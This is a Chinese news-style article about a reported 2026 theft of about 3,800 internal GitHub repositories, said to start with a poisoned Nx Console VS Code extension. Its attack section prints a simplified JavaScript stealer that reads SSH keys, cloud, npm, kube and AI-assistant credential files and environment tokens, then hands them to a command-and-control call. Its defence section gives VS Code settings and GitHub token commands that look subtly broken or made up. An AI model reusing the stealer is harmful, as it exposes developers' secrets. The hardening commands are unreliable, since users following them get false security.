当前位置：首页 > article >正文

GitHub史诗级泄露：3800个核心仓库被窃，TeamPCP如何通过VS Code扩展攻破全球最大代码平台

article 2026/5/22 0:41:22

一、引言全球开发者的至暗时刻2026年5月20日一则消息震惊了整个科技界微软旗下全球最大代码托管平台GitHub确认约3800个内部私有仓库被威胁组织TeamPCP窃取涵盖GitHub Copilot、CodeQL、GitHub Actions、Codespaces、Dependabot等所有核心产品的源代码以及内部基础设施配置和安全系统源码。攻击者在暗网Breached论坛公开出售这批数据标价5万美元起售并声称这不是勒索只要有一个买家就会销毁数据否则将在72小时内免费公开全部内容。GitHub官方紧急声明“目前没有证据表明客户数据受到影响但我们正在全力调查并采取一切必要措施保护平台安全”。这不是一起普通的数据泄露事件。这是软件供应链攻击史上最具标志性的案例之一——攻击者利用开发者对常用工具的信任通过一个看似无害的VS Code扩展成功突破了全球最懂代码安全的公司的防线直取其最核心的资产。二、事件完整时间线从暗网爆料到官方确认时间事件5月18日 03:18 UTC攻击者向Nx Console扩展仓库推送恶意孤儿提交植入后门代码5月18日 12:36-12:47 UTC恶意版本Nx Console v18.95.0发布到VS Code Marketplace持续11分钟5月18日下午GitHub一名员工安装了该恶意扩展设备被入侵凭证被窃取5月19日凌晨攻击者利用窃取的凭证横向渗透至GitHub内网开始批量拉取内部仓库5月19日 18:00 UTCTeamPCP在暗网Breached论坛发布出售信息声称掌握约4000个GitHub私有仓库5月19日 20:00 UTCGitHub在X平台发布初步声明确认正在调查内部仓库未授权访问事件5月20日 00:00 UTCGitHub完成关键密钥轮换切断攻击者访问5月20日 10:00 UTCGitHub更新声明正式确认约3800个内部仓库被窃取攻击源头为恶意VS Code扩展5月20日 15:00 UTCNx团队发布公告确认其扩展被投毒已移除恶意版本并重置所有发布凭证三、攻击方深度剖析TeamPCP(UNC6780)——2026年最危险的供应链杀手TeamPCP微软威胁情报编号UNC6780是2026年3月才浮出水面的新兴威胁组织但在短短两个月内已经发动了多起震惊业界的供应链攻击成为全球软件供应链安全的头号威胁。3.1 攻击历史与目标2026年3月投毒安全扫描工具Trivy和Checkmarx的VS Code扩展窃取数千名开发者凭证2026年4月入侵npm包管理系统发布多个恶意版本的流行包影响超过10万个项目2026年5月19日同时发动两起重大攻击投毒微软Azure官方Python SDKdurabletask以及攻破GitHub内部系统该组织的攻击目标非常明确专注于软件供应链上游通过攻击开发者工具和平台实现对下游数百万用户的大规模感染。与传统勒索组织不同TeamPCP不进行勒索而是通过出售窃取的数据获利这使得其攻击更加难以防范和追踪。3.2 典型攻击模式TeamPCP已经形成了一套成熟的供应链投毒五步法凭证窃取通过钓鱼或之前的攻击获取开源项目贡献者的GitHub Token和VS Code Marketplace发布凭证代码投毒向流行的开源项目或VS Code扩展植入恶意代码保持原有功能不变以避免被发现批量感染利用官方渠道发布恶意版本感染大量开发者设备横向扩展从被感染设备窃取更多凭证继续攻击其他项目和平台数据变现在暗网出售窃取的源代码和敏感数据四、攻击技术链全解析从一个扩展到3800个仓库本次攻击是TeamPCP攻击模式的完美演绎技术细节令人不寒而栗。安全研究人员通过对恶意扩展的逆向分析完整还原了整个攻击链。4.1 初始入口Nx Console扩展投毒技术细节本次攻击的入口是流行的VS Code扩展Nx Console v18.95.0。Nx Console是一个用于管理Nx工作区的工具拥有超过500万次下载量被大量企业和开发者使用。攻击者首先窃取了一名前Nx贡献者的GitHub个人访问令牌(PAT)该令牌拥有对Nx仓库的推送权限和VS Code Marketplace的发布权限。这是TeamPCP的标准操作——他们从不从零开始创建恶意扩展而是劫持已有高信任度的扩展。关键技术点孤儿提交投毒法攻击者没有直接向主分支推送恶意代码而是使用了一种非常隐蔽的孤儿提交技术# 创建一个没有父提交的孤儿分支gitcheckout--orphanmalicious-branch# 删除所有文件gitrm-rf.# 添加恶意代码文件echomalicious codeenvironmentAuthChecker.js# 提交gitcommit-mchore: update auth checker# 推送一个不存在于任何分支的提交gitpush origin 558b09d7ad0d1660e2a0fb8a06da81a6f42e06d2这个提交(558b09d7)没有任何父提交也不属于任何分支在GitHub UI中完全不可见。只有当构建脚本明确拉取这个特定SHA时恶意代码才会被包含在最终的扩展包中。这种方法完美绕过了所有代码审查流程——没有人会去审查一个不存在于任何分支的提交。4.2 凭证窃取多平台Token抓取原理恶意扩展在安装后会在后台静默执行一个多阶段的凭证窃取器。它不会立即联网而是先扫描本地文件系统收集所有可能的凭证和敏感信息。窃取的目标包括Git配置文件中的用户名和邮箱~/.ssh目录下的所有SSH私钥~/.git-credentials文件中的Git凭证GitHub CLI存储的Tokennpm、yarn、pnpm的发布TokenAWS、Azure、GCP的云服务凭证HashiCorp Vault的访问令牌Kubernetes配置文件1Password、Bitwarden等密码管理器的本地缓存Claude Code、GitHub Copilot等AI助手的配置文件恶意代码核心片段简化版constfsrequire(fs);constosrequire(os);constpathrequire(path);// 要窃取的文件路径列表consttargetFiles[~/.git-credentials,~/.ssh/id_rsa,~/.ssh/id_ed25519,~/.npmrc,~/.aws/credentials,~/.azure/credentials,~/.kube/config,~/.config/gh/hosts.yml,~/.claude/settings.json];functionstealCredentials(){conststolen{};for(constfileoftargetFiles){constfullPathpath.join(os.homedir(),file.replace(~,));if(fs.existsSync(fullPath)){try{stolen[file]fs.readFileSync(fullPath,utf8);}catch(e){// 忽略无法读取的文件}}}// 窃取环境变量中的TokenconstenvTokens{};for(constkeyinprocess.env){if(key.includes(TOKEN)||key.includes(SECRET)||key.includes(KEY)){envTokens[key]process.env[key];}}stolen[env]envTokens;// 将窃取的数据发送到C2服务器sendToC2(stolen);}// 延迟执行避免被检测setTimeout(stealCredentials,30000);特别值得注意的是恶意代码专门针对Claude Code的配置文件进行了窃取。这与TeamPCP在2月份的攻击一脉相承——他们曾尝试利用AI编码助手作为凭证窃取工具。4.3 横向移动从员工设备到GitHub内网当GitHub员工安装了这个恶意扩展后攻击者成功获取了该员工的所有凭证包括GitHub内部系统的访问令牌。GitHub内部使用基于角色的访问控制(RBAC)系统不同员工拥有不同级别的仓库访问权限。不幸的是这名被入侵的员工拥有相当高的权限可以访问大部分内部仓库。攻击者利用窃取的令牌通过GitHub API和SSH协议横向渗透至GitHub内部网络。他们没有立即大规模下载仓库而是先进行了细致的侦察列出了所有可访问的仓库并按照重要性进行了排序。4.4 数据窃取批量仓库拉取与外逃在确认权限足够后攻击者开始批量克隆内部仓库。为了避免触发异常检测他们采用了以下策略控制下载速度模拟正常开发者的行为使用多个不同的IP地址进行下载优先下载核心产品和安全相关的仓库将数据分块压缩后通过多个不同的渠道外逃整个数据窃取过程持续了约12小时直到5月19日下午TeamPCP在暗网发帖GitHub才发现这起入侵事件。五、泄露内容与影响深度分析GitHub官方确认约3800个内部仓库被窃取这相当于GitHub内部代码库的约15%。虽然GitHub强调客户数据未受影响但这次泄露的影响远比表面上看起来要深远得多。5.1 核心产品源码泄露泄露的仓库涵盖了GitHub所有核心产品的源代码GitHub CopilotAI编码助手的核心算法、训练数据处理流程、模型推理代码CodeQLGitHub的静态代码分析引擎包括所有内置的漏洞检测规则GitHub ActionsCI/CD平台的核心代码和运行时环境Codespaces云端开发环境的基础设施代码Dependabot依赖更新工具的核心逻辑GitHub Enterprise Server企业版GitHub的完整源代码内部安全系统入侵检测、日志分析、漏洞管理系统的代码5.2 技术壁垒与漏洞风险暴露这次泄露最严重的后果不是知识产权的损失而是GitHub的技术安全防线被彻底暴露在攻击者面前。零日漏洞挖掘攻击者现在可以逐行审查GitHub的源代码寻找未被发现的零日漏洞。这些漏洞可以被用来攻击GitHub平台本身以及所有使用GitHub产品的企业安全绕过技术CodeQL的漏洞检测规则泄露后攻击者可以针对性地开发能够绕过这些检测的恶意代码供应链攻击升级GitHub Actions和Dependabot的源码泄露使得攻击者可以设计出更隐蔽的供应链攻击手段内部架构暴露GitHub的内部网络架构、认证系统、权限管理机制全部曝光为未来的攻击提供了详细的路线图5.3 全球供应链连锁风险GitHub是全球软件供应链的核心节点超过1亿开发者和400万企业使用GitHub平台。这次泄露将产生多米诺骨牌效应Copilot安全风险如果Copilot的核心算法存在漏洞那么所有使用Copilot的开发者都可能受到影响企业客户信任危机大量企业将自己的核心代码托管在GitHub上这次事件让他们对GitHub的安全能力产生了严重质疑开源生态系统动荡GitHub维护着大量关键的开源项目这些项目的安全现在也面临威胁六、GitHub应急响应措施评估GitHub在发现入侵后采取了一系列紧急措施隔离与清除立即隔离被感染的员工设备移除恶意扩展版本密钥全轮换在一夜之间轮换了所有内部密钥、员工凭据和服务账号权限审计对所有员工的访问权限进行全面审计撤销不必要的高权限日志分析对过去90天的所有访问日志进行全面分析寻找其他可能的入侵痕迹客户沟通通过官方渠道向客户通报事件进展承诺如果发现客户数据受影响将立即通知这些措施是标准的应急响应流程但也暴露出GitHub在安全防护上的一些不足检测延迟从攻击者开始窃取数据到GitHub发现入侵间隔了超过12小时权限管理漏洞单个员工拥有访问数千个核心仓库的权限违反了最小权限原则扩展安全防护不足VS Code Marketplace的安全扫描未能检测到恶意代码七、开发者与企业级全方位防护指南这次事件给所有开发者和企业敲响了警钟开发工具链已经成为网络攻击的核心战场。以下是全方位的防护指南帮助你保护自己的代码和数据安全。7.1 VS Code扩展安全加固VS Code扩展拥有与用户相同的系统权限是最危险的攻击面之一。立即执行的检查清单卸载所有不常用的扩展检查已安装扩展的发布者只保留经过官方验证的发布者有蓝色对勾标记禁用所有来自第三方市场的扩展开启VS Code的工作区信任功能定期检查扩展的更新历史避免使用长期未更新的扩展VS Code扩展安全配置settings.json{// 禁用未信任工作区的所有扩展security.workspace.trust.enabled:true,security.workspace.trust.startupPrompt:always,// 限制扩展的网络访问extensions.networking.allowedDomains:[https://*.vscode-unpkg.net,https://*.github.com],// 禁用自动更新手动审核每个更新extensions.autoUpdate:false,extensions.autoCheckUpdates:true,// 只允许经过验证的发布者extensions.allowedTrustedPublishers:[ms-vscode,GitHub,ms-python]}使用VSCan工具扫描已安装的扩展# 安装VSCannpminstall-gvscan# 扫描所有已安装的扩展vscan scan--all# 扫描特定扩展vscan scan ms-vscode.csharp7.2 凭据安全最佳实践凭据是攻击者最想获取的资产必须采取最严格的保护措施。使用专用Git账号为不同的项目使用不同的Git账号避免一个账号泄露导致所有项目受损使用短生命周期的Token不要使用永久有效的个人访问令牌使用有效期不超过24小时的临时Token开启强制2FA为所有账号开启双因素认证优先使用硬件密钥如YubiKey不要在本地存储高权限凭证使用密码管理器或云密钥管理服务存储凭证定期轮换所有凭据至少每90天轮换一次所有密码和TokenGitHub Token安全配置示例# 创建一个有效期为24小时的最小权限Tokengh auth login --with-tokenEOF ghp_xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx EOF# 只授予必要的权限gh api\-XPATCH\-HAccept: application/vnd.githubjson\/user/tokens/123456\-fscopes[]repo\-fexpires_at$(date-u-d24 hours%Y-%m-%dT%H:%M:%SZ)7.3 开发环境隔离方案永远不要相信你的开发环境是安全的。采用多层隔离策略将攻击的影响范围降到最低。使用容器化开发环境使用Docker或GitHub Codespaces进行开发每个项目使用独立的容器网络隔离将开发环境与生产环境物理隔离开发设备不能直接访问生产系统文件系统隔离使用虚拟机或沙箱运行不可信的代码和扩展进程隔离使用Linux命名空间或Windows沙箱隔离不同的开发工具使用Docker创建隔离的开发环境FROM node:20-alpine # 安装必要的开发工具 RUN apk add --no-cache git openssh-client # 创建非root用户 RUN adduser -D developer USER developer # 设置工作目录 WORKDIR /app # 只挂载必要的目录 VOLUME [/app/src] # 启动shell CMD [/bin/sh]7.4 企业级供应链安全管控体系企业需要建立全生命周期的供应链安全管控体系覆盖从开发到部署的整个流程。建立内部扩展市场对所有外部扩展进行二次安全扫描后再提供给开发者使用实施代码签名验证所有内部代码和依赖都必须进行数字签名防止被篡改持续依赖扫描使用Trivy、Dependabot等工具持续扫描依赖中的漏洞异常行为监控监控代码仓库的异常访问和提交行为及时发现入侵定期安全审计每季度对整个开发流程进行一次全面的安全审计八、前瞻性思考2026年软件供应链安全的三大趋势这次GitHub泄露事件标志着软件供应链攻击进入了一个新的阶段。展望未来我们可以看到以下三大趋势8.1 AI驱动的供应链攻击成为主流TeamPCP已经展示了如何利用AI编码助手作为攻击工具。未来攻击者将越来越多地使用AI技术来自动生成更隐蔽的恶意代码绕过基于AI的安全检测系统利用AI助手的信任关系进行社会工程学攻击自动化大规模供应链攻击8.2 开发者工具成为首要攻击目标开发者拥有最高的系统权限和最有价值的资产是攻击者的首选目标。未来我们将看到更多针对以下工具的攻击IDE和代码编辑器版本控制系统CI/CD平台包管理器安全扫描工具8.3 零信任架构成为标配传统的边界防护已经无法应对现代供应链攻击。零信任架构——“永不信任始终验证”——将成为企业安全的标配所有访问都必须经过身份验证和授权权限基于最小特权原则所有流量都必须加密和监控持续的安全验证和审计九、结语信任危机下的开发者安全觉醒GitHub泄露事件是一个分水岭。它让我们清醒地认识到在数字化时代代码安全已经不仅仅是技术问题更是国家安全和企业生存的问题。作为开发者我们曾经相信官方市场的扩展是安全的相信大公司的安全团队能够保护我们。但这次事件打破了这个幻想。我们必须从被动的受害者转变为主动的安全守护者建立起自己的安全防线。安全不是一次性的工作而是一个持续的过程。它需要我们在每天的开发工作中时刻保持警惕养成良好的安全习惯。只有这样我们才能在这个充满威胁的数字世界中保护好自己的代码和数据。最后我想引用一句安全界的名言你不必跑得比熊快你只需要跑得比你的同伴快。在供应链攻击日益猖獗的今天这句话比以往任何时候都更加真实。

GitHub史诗级泄露：3800个核心仓库被窃，TeamPCP如何通过VS Code扩展攻破全球最大代码平台

相关文章：

GitHub史诗级泄露：3800个核心仓库被窃，TeamPCP如何通过VS Code扩展攻破全球最大代码平台

使用Taotoken后Keil5项目代码审查效率的直观提升

一文讲透｜盘点2026年标杆级的AI论文网站

Godot 4.3+生产级3D反向运动学（IK）系统实战指南

终极指南：免费开源的AMD Ryzen调试神器SMUDebugTool完整使用教程

PostHog完整指南：5分钟搭建开源产品分析平台，免费监控用户行为

Minecraft性能监控终极指南：如何用Spark快速诊断服务器卡顿

终极QR码修复指南：如何用QrazyBox免费恢复损坏的二维码

如何在5分钟内掌握DistroAV网络视频传输：新手完整指南

GanttProject终极指南：免费开源的项目管理工具完全攻略

OBS智能背景移除插件：零绿幕实现专业直播效果的完整指南

GBase 8a之listagg/string_agg 函数的反函数实现

GBase 8a数据库实际支持的索引类型详解

物理标签退场，视觉原生上位：UWB vs 镜像视界无感定位・空间智能重构

3个核心操作：让网络架构可视化变得如此简单

[智能体-7]：业务数据序列化为 JSON 字符串完整示例

标准化封装国产电源：钡特电源 VB50-24S24LD 与金升阳 URB2424LD-50WR3 同属工业高可靠

【独家首发】ElevenLabs未公开的缅甸文字母映射表+音节切分规则（含Unicode 15.1适配清单）

5个核心技术：深度掌握Sollumz在GTA V建模中的架构设计与实战应用

Midjourney新艺术风格突然失效？92%用户忽略的--stylize冲突机制与3步回滚修复法

用户分享 + 消费排队福利模式合规落地指南：5 大实体行业通用方案

实体门店低获客成本增长案例：3 人转介绍模型 + 消费返还机制落地分析

摆脱论文困扰!！2026 最新降AIGC软件测评与推荐

技术突破：如何让ARM设备突破x86架构的束缚？

6款优质降AIGC平台降痕效果拉满

Captain AI：Ozon售后全流程智能化，降低损失，提升复购

智能驾驶系统场景下的自动化仿真测试评价技术【附仿真】

3分钟完成Excel批量查询：智能多文件搜索工具完整指南

Captain AI：Ozon俄文内容本地化，打破语言壁垒，贴合本土需求

使用电脑快速测试 PROFINET 设备通讯